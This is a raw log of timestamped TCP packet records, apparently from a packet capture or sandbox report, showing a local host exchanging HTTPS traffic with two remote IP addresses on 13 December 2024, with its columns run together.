                                                                                                                                                            Dec 13, 2024 07:38:23.299418926 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.301418066 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.451001883 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.451031923 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.451138973 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.451214075 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.451270103 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.457034111 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.457053900 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.457098961 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.457114935 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.457145929 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.457168102 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.462853909 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.462876081 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.462923050 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.462935925 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.462961912 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.463001013 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.463661909 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.463733912 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.463743925 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.463759899 CET44349733151.101.1.137192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:23.463804007 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:23.466495037 CET49733443192.168.2.4151.101.1.137
                                                                                                                                                            Dec 13, 2024 07:38:37.723387003 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:37.723413944 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:37.723488092 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:37.724766970 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:37.724777937 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:38.941190958 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:38.941387892 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:38.952507019 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:38.952532053 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:38.952780962 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:38.963632107 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:39.011332989 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.828685045 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.828744888 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.828777075 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.828815937 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.828810930 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:39.828845024 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.828886986 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.828923941 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:39.828949928 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:39.836935997 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.845314980 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.845367908 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.845385075 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:39.845402002 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.845453024 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:39.853653908 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:39.893441916 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.020632982 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.022953033 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.023010015 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.023040056 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.030883074 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.030941963 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.030958891 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.046335936 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.046397924 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.046411991 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.054078102 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.054132938 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.054146051 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.062027931 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.062077999 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.062091112 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.069854975 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.069912910 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.069926023 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.077574968 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.077630997 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.077644110 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.085406065 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.086514950 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.086528063 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.093199015 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.093265057 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.093277931 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.143436909 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.143450975 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.190476894 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.212939024 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.216747046 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.216831923 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.216847897 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.224522114 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.224587917 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.224601030 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.232106924 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.232171059 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.232182980 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.239468098 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.239518881 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.239532948 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.260077000 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.260087967 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.260170937 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.260185003 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.267119884 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.267179966 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.267193079 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.267246962 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.280966043 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.280972958 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.281094074 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.294722080 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.294729948 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.294795990 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.308588982 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.308595896 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.308655024 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.315643072 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.315649986 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.315709114 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.329356909 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.329364061 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.329432964 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.408166885 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.408260107 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.418251991 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.418322086 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.424158096 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.424231052 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.434756994 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.434825897 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.445053101 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.445139885 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.449758053 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.449827909 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.458693981 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.458758116 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.467514038 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.467576981 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.472086906 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.472148895 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.481101990 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.481204987 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.489773989 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.489840031 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.494487047 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.494554043 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.503427029 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.503495932 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.512144089 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.512197971 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.516594887 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.516653061 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.525404930 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.525468111 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.534173965 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.534236908 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.543078899 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.543143988 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.549657106 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.549725056 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.598870993 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.598958969 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.603255987 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.603349924 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.609970093 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.610060930 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.615919113 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.615991116 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.619422913 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.619493008 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.624865055 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.624943972 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.630228043 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.630291939 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.633753061 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.633831024 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.638570070 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.638653040 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.643893957 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.643954992 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.648983002 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.649044991 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.651748896 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.651809931 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.656677961 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.656774044 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.661674023 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.661745071 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.671567917 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.671577930 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.671632051 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.671639919 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.671675920 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.671710014 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.671734095 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.677659988 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.677731991 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.688472986 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.688499928 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.688564062 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.688582897 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.688637018 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.698354006 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.698373079 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.698436975 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.698452950 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.698507071 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.790544987 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.790590048 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.790709972 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.790734053 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.790781975 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.801706076 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.801723957 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.801805973 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.801820993 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.801887989 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.809484005 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.809499025 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.809592009 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.809604883 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.809658051 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.816324949 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.816340923 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.816410065 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.816423893 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.816483974 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.824908972 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.824928999 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.825006008 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.825020075 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.825081110 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.831418991 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.831444979 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.831513882 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.831527948 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.831587076 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.838953972 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.838970900 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.839041948 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.839055061 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.839107037 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.846076965 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.846091986 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.846169949 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.846183062 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.846240044 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.982124090 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.982142925 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.982260942 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.982317924 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.982384920 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.988660097 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.988676071 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.988742113 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.988758087 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.988877058 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.995076895 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.995093107 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.995161057 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:40.995174885 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:40.995232105 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.001807928 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.001823902 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.001895905 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.001909971 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.001969099 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.007489920 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.007527113 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.007589102 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.007603884 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.007636070 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.007658958 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.014425993 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.014448881 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.014523029 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.014537096 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.014569044 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.014589071 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.020916939 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.020937920 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.020986080 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.020999908 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.021028042 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.021048069 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.027440071 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.027460098 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.027514935 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.027529001 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.027587891 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.174256086 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.174278021 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.174331903 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.174349070 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.174377918 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.174397945 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.181337118 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.181360006 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.181411982 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.181425095 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.181454897 CET49740443192.168.2.4104.21.84.67
